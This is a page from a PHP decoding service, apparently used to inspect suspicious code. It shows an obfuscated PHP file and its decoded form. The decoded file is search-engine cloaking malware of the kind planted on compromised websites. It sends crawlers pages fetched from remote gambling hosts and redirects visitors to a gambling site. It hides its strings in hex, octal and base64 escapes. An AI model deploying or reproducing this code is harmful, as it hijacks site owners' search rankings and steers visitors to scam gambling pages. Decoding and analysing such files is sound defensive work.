Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php goto Xj20ITY76s; Xj20ITY76s: header("\103\141\x63\x68\145\55\x43\157\156\x74\x72\1..

Decoded Output download

<?php 
 goto Xj20ITY76s; Xj20ITY76s: header("Cache-Control: no-cache, must-revalidate"); header("Expires: Sat, 26 Jul 1997 05:00:00 GMT"); set_time_limit(0); error_reporting(0); header("Content-Type: text/html;charset=utf-8"); goto mRGvLW_eUH; EhSjmOT3Tm: function getContents($url) { goto DG0_nwnwwm; lEXsFD0NXo: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); if (!($result == NULL)) { goto ZAAp9ju0XT; } return file_get_contents($url); goto Pa50jD3YJo; Pa50jD3YJo: ZAAp9ju0XT: return $result; JIyky02RdJ: goto PVw4qm25Wf; lDk86KI55t: curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto lEXsFD0NXo; DG0_nwnwwm: if (function_exists("curl_init")) { goto WGo0ToPUhB; } return file_get_contents($url); goto JIyky02RdJ; WGo0ToPUhB: $ch = curl_init(); goto lDk86KI55t; PVw4qm25Wf: } $key = $_SERVER["HTTP_USER_AGENT"]; if (isEngines($key)) { goto wodThkmQFy; } if (!isIncludes()) { goto uLhHscmEE5; } header("Location: https://qh11.vip/"); goto LURf5UoTJp; gM94RgSH2K: if (isIncludes()) { goto rvr_8_dDF9; } $content = file_get_contents("http://shuju.vn1788.com/qh88.php"); $content = preg_replace("/href=["']" . preg_quote(base64_decode("aHR0cHM6Ly9xaDg4LnZuMTc4OC5jb20v"), "/") . "([^"']+)["']/i", "href="$1"", $content); echo $content; goto TJOLvgTbRm; goto LPgXNup4bx; krz9PucQJC: TJOLvgTbRm: goto yOLsl3_cxe; mRGvLW_eUH: define("URI", $_SERVER["REQUEST_URI"]); define("host", base64_decode("aHR0cHM6Ly9xaDg4LnZuMTc4OC5jb20v")); define("MULU", "app|ios|android|download|blank|bet|casino|games|ppt|poker|root"); function isEngines($key) { return stristr($key, "Googlebot") !== false || stristr($key, "Bingbot") !== false || stristr($key, "Yahoo!") !== false; } function isIncludes() { $re = 0; $temp = explode("|", MULU); foreach ($temp as $v) { if (!(stristr(URI, $v) !== false)) { goto Hy8_y5Np5j; } $re = 1; Hy8_y5Np5j: P_k_hiGhbN: } Zfx0Sz3OKu: return $re; } goto EhSjmOT3Tm; LPgXNup4bx: rvr_8_dDF9: $content = getContents(host . "?xhost=" . $_SERVER["HTTP_HOST"] . "&reurl=" . URI . "&ua=Baiduspider" . "&f=bd"); $content = preg_replace("/href=["']" . preg_quote(base64_decode("aHR0cHM6Ly9xaDg4LnZuMTc4OC5jb20v"), "/") . "([^"']+)["']/i", "href="$1"", $content); echo $content; exit; goto krz9PucQJC; LURf5UoTJp: exit; uLhHscmEE5: goto jp97jEBROj; wodThkmQFy: header("Content-Type:text/html;charset=utf-8"); goto gM94RgSH2K; yOLsl3_cxe: jp97jEBROj: ?>

Did this file decode correctly?

Original Code

<?php
 goto Xj20ITY76s; Xj20ITY76s: header("\103\141\x63\x68\145\55\x43\157\156\x74\x72\157\x6c\x3a\x20\156\x6f\55\x63\x61\x63\x68\145\x2c\40\155\165\x73\164\x2d\x72\x65\x76\141\154\151\144\141\x74\145"); header("\x45\x78\x70\x69\162\145\x73\x3a\40\x53\141\x74\x2c\x20\x32\66\x20\112\x75\154\40\x31\x39\71\x37\40\x30\x35\x3a\60\60\x3a\x30\x30\40\107\x4d\124"); set_time_limit(0); error_reporting(0); header("\103\x6f\156\x74\145\156\164\x2d\x54\171\x70\145\72\x20\x74\145\x78\x74\57\x68\x74\x6d\154\x3b\143\150\141\162\x73\x65\x74\x3d\x75\164\146\x2d\70"); goto mRGvLW_eUH; EhSjmOT3Tm: function getContents($url) { goto DG0_nwnwwm; lEXsFD0NXo: curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); $result = curl_exec($ch); curl_close($ch); if (!($result == NULL)) { goto ZAAp9ju0XT; } return file_get_contents($url); goto Pa50jD3YJo; Pa50jD3YJo: ZAAp9ju0XT: return $result; JIyky02RdJ: goto PVw4qm25Wf; lDk86KI55t: curl_setopt($ch, CURLOPT_USERAGENT, "\115\157\172\151\154\x6c\x61\x2f\65\56\x30\40\x28\x63\x6f\x6d\160\141\164\151\x62\x6c\x65\73\40\107\157\157\147\154\x65\x62\x6f\x74\57\62\56\x31\73\x20\53\150\164\x74\x70\72\x2f\57\167\167\167\56\x67\157\x6f\x67\x6c\145\56\x63\x6f\x6d\57\142\x6f\x74\56\x68\164\x6d\x6c\x29"); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); goto lEXsFD0NXo; DG0_nwnwwm: if (function_exists("\x63\165\x72\x6c\x5f\x69\156\151\x74")) { goto WGo0ToPUhB; } return file_get_contents($url); goto JIyky02RdJ; WGo0ToPUhB: $ch = curl_init(); goto lDk86KI55t; PVw4qm25Wf: } $key = $_SERVER["\x48\x54\124\120\x5f\125\123\105\122\137\101\107\105\x4e\124"]; if (isEngines($key)) { goto wodThkmQFy; } if (!isIncludes()) { goto uLhHscmEE5; } header("\114\157\x63\141\164\x69\x6f\156\x3a\40\150\164\x74\160\163\72\57\x2f\161\x68\61\x31\56\x76\x69\160\57"); goto LURf5UoTJp; gM94RgSH2K: if (isIncludes()) { goto rvr_8_dDF9; } $content = file_get_contents("\x68\164\x74\160\x3a\57\x2f\163\150\x75\152\165\56\166\156\61\67\x38\x38\56\143\157\155\57\161\150\70\x38\x2e\x70\150\160"); $content = preg_replace("\57\150\162\145\146\75\x5b\42\47\135" . preg_quote(base64_decode("\141\110\122\x30\143\110\x4d\x36\114\x79\x39\170\x61\x44\147\64\x4c\x6e\132\165\115\x54\143\x34\117\103\65\x6a\x62\62\60\x76"), "\x2f") . "\x28\x5b\x5e\42\x27\135\x2b\x29\x5b\42\47\x5d\x2f\151", "\150\x72\x65\146\75\42\x24\61\42", $content); echo $content; goto TJOLvgTbRm; goto LPgXNup4bx; krz9PucQJC: TJOLvgTbRm: goto yOLsl3_cxe; mRGvLW_eUH: define("\x55\122\x49", $_SERVER["\122\x45\x51\125\x45\123\124\137\125\122\x49"]); define("\150\x6f\x73\x74", base64_decode("\141\x48\x52\x30\x63\110\115\66\x4c\x79\71\x78\x61\x44\x67\64\114\x6e\132\165\115\x54\x63\64\117\103\x35\x6a\142\x32\60\166")); define("\115\125\114\x55", "\141\160\x70\174\151\x6f\163\174\141\x6e\144\x72\157\x69\x64\x7c\x64\x6f\x77\156\x6c\157\141\x64\174\142\x6c\141\x6e\x6b\174\142\x65\x74\174\x63\x61\163\x69\x6e\x6f\x7c\147\x61\x6d\145\x73\174\x70\x70\x74\174\160\157\x6b\x65\162\x7c\x72\157\x6f\164"); function isEngines($key) { return stristr($key, "\x47\x6f\x6f\x67\x6c\x65\142\157\164") !== false || stristr($key, "\x42\x69\156\x67\142\x6f\x74") !== false || stristr($key, "\x59\141\x68\157\157\41") !== false; } function isIncludes() { $re = 0; $temp = explode("\x7c", MULU); foreach ($temp as $v) { if (!(stristr(URI, $v) !== false)) { goto Hy8_y5Np5j; } $re = 1; Hy8_y5Np5j: P_k_hiGhbN: } Zfx0Sz3OKu: return $re; } goto EhSjmOT3Tm; LPgXNup4bx: rvr_8_dDF9: $content = getContents(host . "\77\170\x68\157\163\x74\75" . $_SERVER["\x48\x54\124\120\x5f\x48\117\x53\124"] . "\46\x72\x65\x75\162\154\x3d" . URI . "\x26\165\141\x3d\102\x61\151\x64\x75\163\x70\151\144\x65\x72" . "\x26\x66\75\142\144"); $content = preg_replace("\57\x68\x72\x65\x66\75\x5b\x22\47\135" . preg_quote(base64_decode("\x61\x48\122\60\x63\x48\x4d\66\114\171\71\x78\x61\104\147\64\x4c\x6e\132\x75\115\x54\x63\64\117\103\x35\152\142\x32\x30\x76"), "\57") . "\50\x5b\x5e\x22\47\135\x2b\x29\133\x22\47\135\x2f\x69", "\x68\162\145\146\75\42\44\61\x22", $content); echo $content; exit; goto krz9PucQJC; LURf5UoTJp: exit; uLhHscmEE5: goto jp97jEBROj; wodThkmQFy: header("\x43\157\x6e\x74\145\x6e\x74\x2d\124\171\x70\145\x3a\164\x65\170\x74\x2f\x68\x74\x6d\154\73\x63\x68\x61\162\163\145\164\x3d\165\x74\146\55\x38"); goto gM94RgSH2K; yOLsl3_cxe: jp97jEBROj:

Function Calls

None

Variables

None

Stats

MD5 104177312971acaf9970538a7caad803
Eval Count 0
Decode Time 38 ms